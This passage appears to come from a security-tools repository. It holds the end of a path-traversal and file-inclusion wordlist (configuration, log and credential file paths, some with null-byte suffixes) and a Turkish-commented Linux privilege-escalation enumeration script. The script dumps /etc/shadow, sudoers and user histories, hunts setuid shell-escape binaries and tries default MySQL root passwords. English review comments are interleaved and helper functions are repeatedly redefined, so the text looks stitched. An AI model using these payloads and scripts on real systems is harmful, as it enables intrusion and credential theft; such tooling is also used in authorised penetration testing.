/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini 1364 | /Volumes/Macintosh_HD1/usr/local/php/lib/php.ini%00 1365 | /volumes/webbackup/opt/apache2/conf/httpd.conf 1366 | /Volumes/webBackup/opt/apache2/conf/httpd.conf 1367 | /Volumes/webBackup/opt/apache2/conf/httpd.conf%00 1368 | /volumes/webbackup/private/etc/httpd/httpd.conf 1369 | /Volumes/webBackup/private/etc/httpd/httpd.conf 1370 | /Volumes/webBackup/private/etc/httpd/httpd.conf%00 1371 | /volumes/webbackup/private/etc/httpd/httpd.conf.default 1372 | /Volumes/webBackup/private/etc/httpd/httpd.conf.default 1373 | /Volumes/webBackup/private/etc/httpd/httpd.conf.default%00 1374 | /wamp/bin/apache/apache2.2.21/conf/httpd.conf 1375 | /wamp/bin/apache/apache2.2.21/logs/access.log 1376 | /wamp/bin/apache/apache2.2.21/logs/error.log 1377 | /wamp/bin/apache/apache2.2.21/wampserver.conf 1378 | /wamp/bin/apache/apache2.2.22/conf/httpd.conf 1379 | /wamp/bin/apache/apache2.2.22/conf/wampserver.conf 1380 | /wamp/bin/apache/apache2.2.22/logs/access.log 1381 | /wamp/bin/apache/apache2.2.22/logs/error.log 1382 | 
/wamp/bin/apache/apache2.2.22/wampserver.conf 1383 | /wamp/bin/mysql/mysql5.5.16/data/mysql-bin.index 1384 | /wamp/bin/mysql/mysql5.5.16/my.ini 1385 | /wamp/bin/mysql/mysql5.5.16/wampserver.conf 1386 | /wamp/bin/mysql/mysql5.5.24/data/mysql-bin.index 1387 | /wamp/bin/mysql/mysql5.5.24/my.ini 1388 | /wamp/bin/mysql/mysql5.5.24/wampserver.conf 1389 | /wamp/bin/php/php5.3.8/php.ini 1390 | /wamp/bin/php/php5.4.3/php.ini 1391 | /wamp/logs/access.log 1392 | /wamp/logs/apache_error.log 1393 | /wamp/logs/genquery.log 1394 | /wamp/logs/mysql.log 1395 | /wamp/logs/slowquery.log 1396 | /Web.config 1397 | /web/conf/php.ini 1398 | /web/conf/php.ini%00 1399 | /windows/comsetup.log 1400 | /windows/debug/netsetup.log 1401 | /windows/odbc.ini 1402 | /windows/php.ini 1403 | /WINDOWS\php.ini 1404 | /WINDOWS\php.ini%00 1405 | /windows/repair/setup.log 1406 | /windows/setupact.log 1407 | /windows/setupapi.log 1408 | /windows/setuperr.log 1409 | /windows/system32/drivers/etc/hosts 1410 | /windows/system32/drivers/etc/lmhosts.sam 1411 | /windows/system32/drivers/etc/networks 1412 | /windows/system32/drivers/etc/protocol 1413 | /windows/system32/drivers/etc/services 1414 | /windows/system32/logfiles/firewall/pfirewall.log 1415 | /windows/system32/logfiles/firewall/pfirewall.log.old 1416 | /windows/system32/logfiles/msftpsvc 1417 | /windows/system32/logfiles/msftpsvc1 1418 | /windows/system32/logfiles/msftpsvc2 1419 | /windows/system32/logfiles/smtpsvc 1420 | /windows/system32/logfiles/smtpsvc1 1421 | /windows/system32/logfiles/smtpsvc2 1422 | /windows/system32/logfiles/smtpsvc3 1423 | /windows/system32/logfiles/smtpsvc4 1424 | /windows/system32/logfiles/smtpsvc5 1425 | /windows/system32/logfiles/w3svc1/inetsvn1.log 1426 | /windows/system32/logfiles/w3svc2/inetsvn1.log 1427 | /windows/system32/logfiles/w3svc3/inetsvn1.log 1428 | /windows/system32/logfiles/w3svc/inetsvn1.log 1429 | /windows/system32/macromed/flash/flashinstall.log 1430 | /windows/system32/macromed/flash/install.log 1431 | 
/windows/updspapi.log 1432 | /windows/windowsupdate.log 1433 | /windows/wmsetup.log 1434 | /winnt/php.ini 1435 | /WINNT\php.ini 1436 | /WINNT\php.ini%00 1437 | /winnt/system32/logfiles/firewall/pfirewall.log 1438 | /winnt/system32/logfiles/firewall/pfirewall.log.old 1439 | /winnt/system32/logfiles/msftpsvc 1440 | /winnt/system32/logfiles/msftpsvc1 1441 | /winnt/system32/logfiles/msftpsvc2 1442 | /winnt/system32/logfiles/smtpsvc 1443 | /winnt/system32/logfiles/smtpsvc1 1444 | /winnt/system32/logfiles/smtpsvc2 1445 | /winnt/system32/logfiles/smtpsvc3 1446 | /winnt/system32/logfiles/smtpsvc4 1447 | /winnt/system32/logfiles/smtpsvc5 1448 | /winnt/system32/logfiles/w3svc1/inetsvn1.log 1449 | /winnt/system32/logfiles/w3svc2/inetsvn1.log 1450 | /winnt/system32/logfiles/w3svc3/inetsvn1.log 1451 | /winnt/system32/logfiles/w3svc/inetsvn1.log 1452 | /wp-config.php 1453 | /www/apache/conf/httpd.conf 1454 | /www/conf/httpd.conf 1455 | /www/logs/freebsddiary-access_log 1456 | /www/logs/freebsddiary-error.log 1457 | /www/logs/proftpd.system.log 1458 | /www/logs/proftpd.system.log%00 1459 | /xampp/apache/bin/php.ini 1460 | /xampp\apache\bin\php.ini 1461 | /xampp\apache\bin\php.ini%00 1462 | /xampp/apache/conf/httpd.conf 1463 | \xampp\apache\conf\httpd.conf 1464 | /xampp/apache/logs/access.log 1465 | \xampp\apache\logs\access.log 1466 | /xampp/apache/logs/error.log 1467 | \xampp\apache\logs\error.log 1468 | /xampp/filezillaftp/filezilla 1469 | \xampp\FileZillaFTP\FileZilla Server.xml 1470 | \xampp\FileZillaFTP\Logs 1471 | \xampp\FileZillaFTP\Logs\access.log 1472 | \xampp\FileZillaFTP\Logs\error.log 1473 | /xampp/htdocs/aca.txt 1474 | /xampp/htdocs/admin.php 1475 | /xampp/htdocs/leer.txt 1476 | \xampp\MercuryMail\LOGS\access.log 1477 | \xampp\MercuryMail\LOGS\error.log 1478 | /xampp/mercurymail/mercury.ini 1479 | \xampp\MercuryMail\mercury.ini 1480 | /xampp/mysql/data/{host}.err 1481 | /xampp/mysql/data/mysql-bin.index 1482 | /xampp/mysql/data/mysql.err 1483 | 
\xampp\mysql\data\mysql.err 1484 | \xampp\phpmyadmin\config.inc 1485 | \xampp\phpMyAdmin\config.inc 1486 | /xampp/phpmyadmin/config.inc.php 1487 | \xampp\phpmyadmin\config.inc.php 1488 | \xampp\phpMyAdmin\config.inc.php 1489 | \xampp\phpmyadmin\phpinfo.php 1490 | \xampp\phpMyAdmin\phpinfo.php 1491 | /xampp/php/php.ini 1492 | \xampp\php\php.ini 1493 | /xampp/sendmail/sendmail.ini 1494 | \xampp\sendmail\sendmail.ini 1495 | /xampp/sendmail/sendmail.log 1496 | \xampp\sendmail\sendmail.log 1497 | \xampp\tomcat\conf\tomcat-users.xml 1498 | \xampp\tomcat\conf\web.xml 1499 | /xampp/webalizer/webalizer.conf 1500 | \xampp\webalizer\webalizer.conf 1501 | \xampp\webdav\webdav.txt 1502 | /.xauthority 1503 | .Xauthority 1504 | .zhistory 1505 | .zsh_history 1506 | /.zshrc 1507 | .zshrc 1508 | -------------------------------------------------------------------------------- /linenumv2.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # linuxenum-btr.sh > privesc-enum.txt seklinde kullanalim 3 | # SCRIPTI /var/tmp DIZINI ALTINDA CALISTIRALIM 4 | # EGER SCRIPTI KULLANICINIZIN HOME DIZINI ALTINDA CALISTIRIRSANIZ KENDINIZE 5 | printf '\n=======================================================' 6 | printf '\nTEMEL BILGILER' 7 | printf '\n=======================================================' 8 | printf '\n*******************************************************\n' 9 | printf 'KULLANICI ADI - whoami' 10 | printf '\n*******************************************************\n' 11 | whoami 2>/dev/null 12 | printf '\n*******************************************************\n' 13 | printf 'KULLANICI ID SI VE GRUPLARI - id' 14 | printf '\n*******************************************************\n' 15 | id 2>/dev/null 16 | printf '\n*******************************************************\n' 17 | printf 'HOME DIZINIMIZ - echo $HOME' 18 | printf '\n*******************************************************\n' 19 | echo $HOME 2>/dev/null 20 | printf 
'\n*******************************************************\n' 21 | printf 'HOME DIZIN ICERIGIMIZ VE ERISIM HAKLARI - ls -ahl ~' 22 | printf '\n*******************************************************\n' 23 | ls -ahl ~ 2>/dev/null 24 | printf '\n*******************************************************\n' 25 | printf 'SUDO HAKLARIMIZ - sudo -l -n shell escape imkani verebilecek 26 | komutlara ozellikle dikkat' 27 | printf '\nCikti içinde !env_reset komutu varsa ve sudo versiyonu uygunsa 28 | cevresel degiskenler vasitasiyla priv esc yapilabilir' 29 | printf '\nsudo privilege escalation metodları: 30 | https://www.securusglobal.com/community/2014/03/17/how-i-got-root-with-sudo/' 31 | printf '\nsudo -l -n komutu ile parola vermeden sudo haklarimizi listelemeye 32 | calisiyoruz' 33 | printf '\nEger sudo -l komutu icin parola verilmesi gerekiyorsa ve biz 34 | baglantimizi parolasini bildigimiz bir kullanici ile gerceklestirmis isek bu 35 | komutu manuel olarak calistirmayi unutmayalim' 36 | printf '\n*******************************************************\n' 37 | sudo -l -n 2>/dev/null | tee sudo-config-enum.txt 38 | printf '\n*******************************************************\n' 39 | printf 'SHELL ESCAPE IMKANI VEREN SUDO HAKLARIMIZ - grep komutu ilgisiz 40 | satirlari da yakalayabiliyor o yuzden scripti okuyunuz - tcpdump makalesi 41 | https://www.stevencampbell.info/2016/04/why-sudo-tcpdump-is-dangerous/' 42 | printf '\n*******************************************************\n' 43 | cat sudo-config-enum.txt 2>/dev/null | grep -i -E 'vi|awk|perl|find|nmap|man|more|less|tcpdump|bash|sh|vim|nc|netcat|python|ruby|lua|irb' 44 | printf '\n*******************************************************\n' 45 | printf 'SUDO VERSIYONU - sudo -V: sudo - sudoedit ile ilgili acikliklari 46 | kullanabiliriz 1.8.14 versiyonu icin bakiniz https://www.exploitdb.com/exploits/37710/ 47 | 1.6.9p21 / 1.7.2p4 için bakiniz https://www.exploitdb.com/exploits/11651/ 48 | digerleri icin mutlaka 
google dan arama yapiniz' 49 | printf '\n*******************************************************\n' 50 | sudo -V 51 | printf '\n*******************************************************\n' 52 | printf 'REDHAT ICIN SUDO PAKETI VERSIYONU' 53 | printf '\n*******************************************************\n' 54 | rpm -q sudo 2>/dev/null 55 | printf '\n*******************************************************\n' 56 | printf 'SUDOERS DOSYASI ERISIM HAKLARI' 57 | printf '\n*******************************************************\n' 58 | ls -al /etc/sudoers 2>/dev/null 59 | printf '\n*******************************************************\n' 60 | printf 'SUDOERS DOSYASI ICERIGI- GOREBILIYORSAK - cat /etc/sudoers' 61 | printf '\n*******************************************************\n' 62 | cat /etc/sudoers 2>/dev/null 63 | printf '\n*******************************************************\n' 64 | printf 'SISTEM BILGISI - uname -a' 65 | printf '\n*******************************************************\n' 66 | uname -a 2>/dev/null 67 | printf '\n*******************************************************\n' 68 | printf 'KERNEL BILGISI - cat /proc/version' 69 | printf '\n*******************************************************\n' 70 | cat /proc/version 2>/dev/null 71 | printf '\n*******************************************************\n' 72 | printf 'ISLEMCI MIMARI BILGISI - lscpu' 73 | printf '\n*******************************************************\n' 74 | lscpu 2>/dev/null 75 | printf '\n*******************************************************\n' 76 | printf 'ISLETIM SISTEMI BILGISI' 77 | printf '\n*******************************************************\n' 78 | cat /etc/*-release 79 | printf '\n*******************************************************\n' 80 | printf 'SUNUCU ADI - hostname' 81 | printf '\n*******************************************************\n' 82 | hostname 2>/dev/null 83 | printf '\n*******************************************************\n' 84 | printf 'ROOT - 
YANI ID SI 0 OLAN - KULLANICILARIN LISTESI' 85 | printf '\n*******************************************************\n' 86 | grep -v -E '^#' /etc/passwd | awk -F: '$3 == 0{print $1}' 87 | printf '\n*******************************************************\n' 88 | printf 'SUDO GRUBUNA UYE KULLANICILAR' 89 | printf '\n*******************************************************\n' 90 | for i in $(cat /etc/passwd 2>/dev/null| cut -d':' -f1 2>/dev/null);do id $i;done 2>/dev/null | grep -i "sudo" 91 | printf '\n*******************************************************\n' 92 | printf 'PASSWD DOSYASI - cat /etc/passwd' 93 | printf '\n*******************************************************\n' 94 | cat /etc/passwd 2>/dev/null 95 | printf '\n*******************************************************\n' 96 | printf 'FREEBSD ICIN PASSWD DOSYASI - cat /etc/master.passwd' 97 | printf '\n*******************************************************\n' 98 | cat /etc/master.passwd 2>/dev/null 99 | printf '\n*******************************************************\n' 100 | printf 'KULLANICILARIN GRUP UYELIKLERI - groups bolumune bakiniz' 101 | printf '\n*******************************************************\n' 102 | for i in $(cat /etc/passwd 2>/dev/null| cut -d':' -f1 2>/dev/null);do id $i;done 2>/dev/null 103 | printf '\n*******************************************************\n' 104 | printf 'KULLANICI LISTESI - SHELL UYGULAMASINA GORE SIRALI - cat /etc/passwd 105 | | awk -F: {print $7\011$1} | sort' 106 | printf '\n*******************************************************\n' 107 | cat /etc/passwd | awk -F':' '{print $7"\011"$1}' | sort 108 | printf '\n*******************************************************\n' 109 | printf 'KULLANICI LISTESI - HOME DIZININE GORE SIRALI - cat /etc/passwd | awk 110 | -F: {print $6\011$1} | sort' 111 | printf '\n*******************************************************\n' 112 | cat /etc/passwd | awk -F':' '{print $6"\011"$1}' | sort 113 | printf 
'\n*******************************************************\n' 114 | printf 'DAHA ONCE LOGON OLMUS KULLANICILAR - HER ZAMAN SAGLIKLI BILGI VERMEYEBILIR - lastlog | grep -v Never' 115 | printf '\n*******************************************************\n' 116 | lastlog | grep -v "Never" 2>/dev/null 117 | printf '\n*******************************************************\n' 118 | printf 'SON KULLANICI AKTIVITELERI - last' 119 | printf '\n*******************************************************\n' 120 | last 2>/dev/null 121 | printf '\n*******************************************************\n' 122 | printf 'GROUP DOSYASI - cat /etc/group - ozellikle sudo grup uyeliklerine 123 | dikkat edelim' 124 | printf '\n*******************************************************\n' 125 | cat /etc/group 2>/dev/null 126 | printf '\n*******************************************************\n' 127 | printf 'SHADOW DOSYASI - GOREBILIYORSAK - cat /etc/shadow' 128 | printf '\n*******************************************************\n' 129 | cat /etc/shadow 2>/dev/null 130 | printf '\n*******************************************************\n' 131 | printf '/ROOT/ DIZINI ALTINDAKI DOSYALAR VE ERISIM HAKLARI - ls -ahlR /root/' 132 | printf '\n*******************************************************\n' 133 | ls -ahlR /root/ 2>/dev/null 134 | printf '\n*******************************************************\n' 135 | printf '/HOME/ DIZINI ALTINDAKI DOSYALAR VE ERISIM HAKLARI - ls -ahlR /home/' 136 | printf '\n*******************************************************\n' 137 | ls -ahlR /home/ 2>/dev/null 138 | printf '\n*******************************************************\n' 139 | printf 'EGER HOME DIZINLERI /USR/ DIZINI ALTINDA ISE BURADAKI DOSYALAR VE 140 | ERISIM HAKLARI - ls -ahlR /usr/home/' 141 | printf '\n*******************************************************\n' 142 | ls -ahlR /usr/home/ 2>/dev/null 143 | printf '\n*******************************************************\n' 144 | printf '/HOME/ 
DIZINI ALTINDAKI OKUNABILIR DOSYALARIN LISTESI - find /home/ - 145 | perm -4 -type f -exec ls -al {} \;' 146 | printf '\nNOT: Bu komut manuel inceleme sirasında da hedef dizin adi 147 | degistirilerek kullanilabilir' 148 | printf '\n*******************************************************\n' 149 | find /home/ -perm -4 -type f -exec ls -al {} \; 2>/dev/null 150 | printf '\n*******************************************************\n' 151 | printf 'BAZI HASSAS DOSYALARIN ERISIM HAKLARI - EKLEME YAPILABILIR' 152 | printf '\nNOT: History dosyalari v.d. dosyalar icinde okuma hakkimiz 153 | olanlarin icine manuel olarak goz atilmalidir' 154 | printf '\n*******************************************************\n' 155 | ls -la /etc/passwd 2>/dev/null 156 | ls -la /etc/group 2>/dev/null 157 | ls -la /etc/profile 2>/dev/null 158 | ls -la /etc/shadow 2>/dev/null 159 | ls -la /etc/master.passwd 2>/dev/null 160 | ls -la /etc/sudoers 2>/dev/null 161 | ls -la /etc/crontab 2>/dev/null 162 | ls -la ~/.*_history 2>/dev/null 163 | ls -la /home/*/.*_history 2>/dev/null 164 | ls -la /root/.*_history 2>/dev/null 165 | printf '\n*******************************************************\n' 166 | printf 'KULLANICIMIZIN HISTORY DOSYALARI ICERIKLERI' 167 | printf '\n*******************************************************\n' 168 | cat ~/.*_history 2>/dev/null 169 | printf '\n*******************************************************\n' 170 | printf 'KULLANICIMIZIN HISTORY BILGISI - history KOMUTU CIKTISI' 171 | printf '\n*******************************************************\n' 172 | history 2>/dev/null 173 | printf '\n*******************************************************\n' 174 | printf 'OKUYABILIYORSAK ROOT UN HISTORY DOSYALARI ICERIKLERI' 175 | printf '\n*******************************************************\n' 176 | cat /root/.*_history 2>/dev/null 177 | printf '\n*******************************************************\n' 178 | printf 'OKUYABILDIGIMIZ KULLANICI HISTORY DOSYALARI ICERIKLERI' 179 
# Separator printed between report sections.
_enum_rule() { printf '\n*******************************************************\n'; }

# Closes the heading printed just before this point, then prints the shell
# history files of other users that the current account is able to read.
_enum_rule
cat /home/*/.*_history 2>/dev/null

# All TCP sockets, numeric, with the owning PID/program where visible.
_enum_rule
printf 'TCP SERVISLERIN VE ILGILI PROSESLERIN LISTESI - netstat -antp'
_enum_rule
netstat -antp

# Same view for UDP sockets.
_enum_rule
printf 'UDP SERVISLERIN VE ILGILI PROSESLERIN LISTESI - netstat –anup'
_enum_rule
netstat -anup

# Process-table lines that contain the string "root". This is a plain text
# match, so it also catches the grep itself and any command line that merely
# mentions root.
_enum_rule
printf 'ROOT KULLANICISI OLARAK CALISAN PROSESLER'
_enum_rule
ps aux | grep root

# Heading for the full process list; the listing itself follows this point.
_enum_rule
printf 'TUM PROSESLERIN LISTESI - ps aux - ozellikle MySQL ve Apache prosesleri uzerinden islem yapmak istersek bu proseslerin hangi kullanici haklari ile calistigina dikkat edelim. Bunun disinda calisan prosesler bize baska fikirler verebilir.'
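# Separator printed between report sections.
_enum_rule() { printf '\n*******************************************************\n'; }

# Full process list (its heading was printed just before this point).
_enum_rule
ps aux

# Permissions of the executables behind running processes. Column 11 of
# `ps aux` is the command; entries that are not paths make ls fail quietly,
# and the final awk drops duplicate lines.
_enum_rule
printf 'CALISAN PROSESLERIN IMAJLARI VE BUNLARA ERISIM HAKLARI - ps aux | awk
{print $11}|xargs -r ls -la 2>/dev/null |awk !x[$0]++'
_enum_rule
ps aux | awk '{print $11}' | xargs -r ls -la 2>/dev/null | awk '!x[$0]++'

# Environment of the account running the audit.
_enum_rule
printf 'ENVIRONMENT VARIABLE DEGERLERI'
_enum_rule
printenv

printf '\n======================================================='
printf '\nPRATIK YETKI YUKSELTME ALANLARI'
printf '\n======================================================='

# Root-owned setuid files that "other" can write. On a correctly configured
# host this list is empty; any hit is a permissions finding to remediate.
_enum_rule
printf 'SAHIBI ROOT OLAN OTHER TARAFINDAN YAZILABILIR SETUID DOSYALAR - find
/ -uid 0 -perm -4002 -type f -exec ls -al {} \;'
_enum_rule
find / -uid 0 -perm -4002 -type f -exec ls -al {} \; 2>/dev/null

# Same test without the owner restriction.
_enum_rule
printf 'OTHER TARAFINDAN YAZILABILIR TUM SETUID DOSYALAR - find / -perm -4002-type f -exec ls -al {} \;'
_enum_rule
find / -perm -4002 -type f -exec ls -al {} \; 2>/dev/null

# Every setuid file. The list is shown and also saved for the filter that
# follows. That filter reads setuid-files-enum.txt, so the copy is written
# under exactly that name (the earlier spelling "setuid-filesenum.txt" left
# the filter with nothing to read).
_enum_rule
printf 'TUM SETUID DOSYALAR - find / -perm -4000 -type f -exec ls -al {} \;
Bu dosyalar arasinda grubumuzun yazma hakki olanlara da dikkat edelim, cunku
bu durum icin ozel bir sorgumuz yok'
_enum_rule
find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null | tee setuid-files-enum.txt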
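# Separators printed between report sections and under version headings.
_enum_rule() { printf '\n*******************************************************\n'; }
_enum_dots() { printf '\n..................................\n'; }

# Setuid entries whose name matches a list of interpreters, editors and
# pagers. The match is a loose substring test, so hits need manual review.
# NOTE(review): the input is expected at setuid-files-enum.txt; confirm the
# step that saves the setuid list writes that exact file name.
_enum_rule
printf 'SHELL ESCAPE IMKANI VEREN SETUID DOSYALAR - False positive satirlari
elle incelemek gereklidir, aradigimiz uygulama isimleri icin scripti
okuyunuz'
_enum_rule
grep -i -E 'vi|awk|perl|find|nmap|man|more|less|tcpdump|bash|sh$|vim|nc$|netcat|python|ruby|lua|irb' setuid-files-enum.txt 2>/dev/null \
    | grep -v -E 'chsh|device'

# Setgid files: root-owned and world-writable, any world-writable, then all.
_enum_rule
printf 'SAHIBI ROOT OLAN OTHER TARAFINDAN YAZILABILIR SETGID DOSYALAR - find/ -uid 0 -perm -2002 -type f -exec ls -al {} \;'
_enum_rule
find / -uid 0 -perm -2002 -type f -exec ls -al {} \; 2>/dev/null
_enum_rule
printf 'OTHER TARAFINDAN YAZILABILIR TUM SETGID DOSYALAR - find / -perm -2002 -type f'
_enum_rule
find / -perm -2002 -type f -exec ls -al {} \; 2>/dev/null
_enum_rule
printf 'SETGID ISARETLI TUM DOSYALAR - find / -perm -2000 -type f -exec ls -al {} \;'
_enum_rule
find / -perm -2000 -type f -exec ls -al {} \; 2>/dev/null

# Scheduled jobs: permissions and contents of the cron locations. A job file
# writable by "other" is a permissions finding in its own right.
_enum_rule
printf '/ETC/CRON DIZINLERINDE BULUNAN DOSYALAR VE ERISIM HAKLARI - ls -la /etc/cron*'
_enum_rule
ls -la /etc/cron* 2>/dev/null
_enum_rule
printf 'OTHER TARAFINDAN YAZILABILIR CRON SCRIPTLERI VE ICERIKLERI - find
/etc/cron* -perm -0002 -exec ls -la {} \; -exec cat {} 2>/dev/null \;'
_enum_rule
find /etc/cron* -perm -0002 -exec ls -la {} \; -exec cat {} \; 2>/dev/null
_enum_rule
printf '/ETC/CRONTAB DOSYASI ICERIGI - cat /etc/crontab'
_enum_rule
cat /etc/crontab 2>/dev/null
_enum_rule
printf 'VARSA ROOT VE DIGER KULLANICILARIN CRONTAB DOSYALARI LISTESI - ls -laR /var/spool/cron'
_enum_rule
ls -laR /var/spool/cron 2>/dev/null
_enum_rule
printf 'VARSA ROOT VE DIGER KULLANICILARIN CRONTAB DOSYALARI ICERIKLERI'
_enum_rule
# `tail -n +1` prints each file whole, with a header line when several are given.
find /var/spool/cron/ -type f -exec tail -n +1 {} + 2>/dev/null
_enum_rule
printf 'VARSA /etc/cron.d DIZININDE BULUNAN DOSYALARIN LISTESI - ls -laR
/etc/cron.d'
_enum_rule
ls -laR /etc/cron.d 2>/dev/null
_enum_rule
printf 'VARSA /etc/cron.d DIZININDE BULUNAN DOSYALARIN ICERIKLERI'
_enum_rule
find /etc/cron.d/ -type f -exec tail -n +1 {} + 2>/dev/null
_enum_rule
printf '/ETC/ANACRONTAB DOSYASI ICERIGI - cat /etc/anacrontab'
_enum_rule
cat /etc/anacrontab 2>/dev/null
_enum_rule
printf 'VARSA KULLANICILARIN AKTIF CRON KONFIGURASYONLARI - cat /etc/passwd |
cut -d : -f 1 | xargs -n1 crontab -l -u'
_enum_rule
# One `crontab -l -u NAME` per account in /etc/passwd; failures are discarded.
cut -d ":" -f 1 /etc/passwd | xargs -n1 crontab -l -u 2>/dev/null

# Local MySQL: does the root account accept the password "root", or none at
# all? Either one succeeding is a weak-credential finding. The errors are
# left visible on purpose because they show how the server answered.
_enum_rule
printf 'MYSQL E ROOT - ROOT ERISIM BILGILERIYLE ERISEBILIYOR MUYUZ -mysqladmin -uroot -proot version'
_enum_rule
mysqladmin -uroot -proot version
_enum_rule
printf 'MYSQL E BOS PAROLA ILE ROOT OLARAK ERISEBILIYOR MUYUZ - mysqladmin -uroot version'
_enum_rule
mysqladmin -uroot version
_enum_rule
printf '*** Postgre SQL varsa onun icin de ayrica komutlar calistirilabilir,process listesine gore hareket etmek lazim ***'
_enum_rule

# Version summary, for comparison against vendor advisories and patch levels.
_enum_rule
printf 'VERSIYON BILGILERI - TOPLUCA'
_enum_rule
printf '\nSUDO - VERSIYON - PRIVESC ACIKLIKLARINI KONTROL ET http://www.exploitdb.com/search/?action=search&filter_page=1&filter_description=sudo'
_enum_dots
# The stderr redirect belongs on sudo: placed on grep it silenced nothing, so
# a missing sudo binary leaked a shell error into the report.
sudo -V 2>/dev/null | grep version
printf '\nMYSQL - VERSIYON'
_enum_dots
mysql --version 2>/dev/null
printf '\nPOSTGRESQL - VERSIYON'
_enum_dots
# Silenced like the neighbouring probes so an absent psql adds no noise.
psql -V 2>/dev/null
printf '\nAPACHE - VERSIYON'
_enum_dots
apache2 -v 2>/dev/null
apache2ctl -M 2>/dev/null
httpd -v 2>/dev/null
apachectl -l 2>/dev/null
printf '\nPERL - VERSIYON'
_enum_dots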
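# Separators printed between report sections and under version headings.
_enum_rule() { printf '\n*******************************************************\n'; }
_enum_dots() { printf '\n..................................\n'; }

# Interpreter versions (the Perl heading was printed just before this point).
perl -v 2>/dev/null
printf '\nJAVA - VERSIYON'
_enum_dots
# `java -version` writes its banner to stderr, so discarding stderr hid the
# version itself. Probe for the binary first, then fold stderr into stdout.
if command -v java >/dev/null 2>&1; then
    java -version 2>&1
fi
printf '\nPYTHON - VERSIYON'
_enum_dots
# Python 2 interpreters also report --version on stderr.
if command -v python >/dev/null 2>&1; then
    python --version 2>&1
fi
printf '\nRUBY - VERSIYON'
_enum_dots
ruby -v 2>/dev/null

printf '\n======================================================='
printf '\nUZUN INCELEME'
printf '\n======================================================='

# Build the master path list that the later name-based filters read.
# NOTE(review): dirlist-enum.txt and the lists derived from it are created in
# the current directory with the caller's umask; on a shared host keep them
# private and delete them when the review is finished.
_enum_rule
printf 'DIZIN VE DOSYA LISTESINI OLUSTURUYORUZ - find / > dirlist-enum.txt'
_enum_rule
find / > dirlist-enum.txt 2>/dev/null
printf 'dirlist-enum.txt dosyasi olusturuldu.\n'

# Heading for the *.ini filter; the filter command itself follows this point.
_enum_rule
printf 'SONU INI ILE BITEN DOSYALARIN LISTESI - grep -i -E ini$ dirlistenum.txt > ini-files-enum.txt'
printf '\nNOT: Uzun suren incelemelerde ini, conf, backup v.b. dosyalarin icerigini manuel olarak inceleyiniz.'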
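# Separator printed between report sections.
_enum_rule() { printf '\n*******************************************************\n'; }

# Name-based filters over dirlist-enum.txt. Each one writes a list file that
# the credential-line search further down reads back.
# NOTE(review): several headings quote a command that differs from the one
# actually run (e.g. "dirlistenum.txt", the INC heading showing log$, the
# SHADOW heading showing the ini filter). The headings are runtime strings and
# are left as written; the commands are authoritative.
_enum_rule
grep -i -E 'ini$' dirlist-enum.txt > ini-files-enum.txt
printf 'ini-files-enum.txt dosyasi olusturuldu.\n'
_enum_rule
printf 'SONU CONF, CONFIG VE CNF ILE BITEN DOSYALARIN LISTESI - grep -i -E conf$|config$|cnf$ dirlist-enum.txt > conf-files-enum.txt'
_enum_rule
grep -i -E 'conf$|config$|cnf$' dirlist-enum.txt > conf-files-enum.txt
printf 'conf-files-enum.txt dosyasi olusturuldu.\n'
_enum_rule
printf 'SONU BACKUP, BCK, BAK, OLD ILE BITEN DOSYALARIN LISTESI - grep -i -E backup$|bck$|bak$|old$ dirlist-enum.txt > backup-files-enum.txt'
_enum_rule
# Written to backup-files-enum.txt, the name announced on the next line; the
# redirect used to target "backup-filesenum.txt".
grep -i -E 'backup$|bck$|bak$|\.old.*$' dirlist-enum.txt > backup-files-enum.txt
printf 'backup-files-enum.txt dosyasi olusturuldu.\n'
_enum_rule
printf 'SONU CAP ILE BITEN DOSYALARIN LISTESI - grep -i -E cap$ dirlistenum.txt > capture-files-enum.txt - dosya tipinden emin olmak icin file komutunu kullanabilirsiniz'
_enum_rule
grep -i -E 'cap$' dirlist-enum.txt > capture-files-enum.txt
printf 'capture-files-enum.txt dosyasi olusturuldu.\n'
_enum_rule
printf 'SONU .PHP ILE BITEN DOSYALARIN LISTESI - grep -i -E .php$ dirlistenum.txt > php-files-enum.txt'
_enum_rule
grep -i -E '\.php$' dirlist-enum.txt > php-files-enum.txt
printf 'php-files-enum.txt dosyasi olusturuldu.\n'
_enum_rule
printf 'SONU .PL ILE BITEN DOSYALARIN LISTESI - grep -i -E .pl$ dirlistenum.txt > pl-files-enum.txt'
_enum_rule
grep -i -E '\.pl$' dirlist-enum.txt > pl-files-enum.txt
printf 'pl-files-enum.txt dosyasi olusturuldu.\n'
_enum_rule
printf 'SONU .SH ILE BITEN DOSYALARIN LISTESI - grep -i -E .sh$ dirlistenum.txt > sh-files-enum.txt'
_enum_rule
grep -i -E '\.sh$' dirlist-enum.txt > sh-files-enum.txt
printf 'sh-files-enum.txt dosyasi olusturuldu.\n'
_enum_rule
printf 'SONU LOG ILE BITEN DOSYALARIN LISTESI - grep -i -E log$ dirlistenum.txt > log-files-enum.txt'
_enum_rule
grep -i -E 'log$' dirlist-enum.txt > log-files-enum.txt
printf 'log-files-enum.txt dosyasi olusturuldu.\n'
_enum_rule
printf 'SONU INC ILE BITEN DOSYALARIN LISTESI - grep -i -E log$ dirlistenum.txt > inc-files-enum.txt'
_enum_rule
grep -i -E 'inc$' dirlist-enum.txt > inc-files-enum.txt
printf 'inc-files-enum.txt dosyasi olusturuldu.\n'
printf 'SONU MYD ILE BITEN DOSYALARIN LISTESI - grep -i -E myd$ dirlistenum.txt > myd-files-enum.txt'
_enum_rule
grep -i -E 'myd$' dirlist-enum.txt > myd-files-enum.txt
printf 'myd-files-enum.txt dosyasi olusturuldu.\n'

# Paths whose name contains a keyword, with their permissions. `xargs -r`
# keeps ls from running with no arguments when a filter matches nothing;
# without it the current directory was listed and looked like a result.
# NOTE(review): xargs splits on whitespace, so paths containing spaces or
# quotes are mis-parsed here.
_enum_rule
printf 'ICINDE SHADOW GECEN DIZIN VEYA DOSYALARIN LISTESI - grep -i -E ini$ dirlist-enum.txt > ini-files-enum.txt'
_enum_rule
grep -i -E 'shadow' dirlist-enum.txt | xargs -r ls -al 2>/dev/null
_enum_rule
printf 'ICINDE PASS GECEN DIZIN VEYA DOSYALARIN LISTESI'
_enum_rule
grep -i -E 'pass' dirlist-enum.txt | xargs -r ls -al 2>/dev/null
_enum_rule
printf 'ICINDE CRON GECEN DIZIN VEYA DOSYALARIN LISTESI - Bu dosyalara manuel olarak bakilmalidir'
_enum_rule
grep -i -E 'cron' dirlist-enum.txt | xargs -r ls -al 2>/dev/null
_enum_rule
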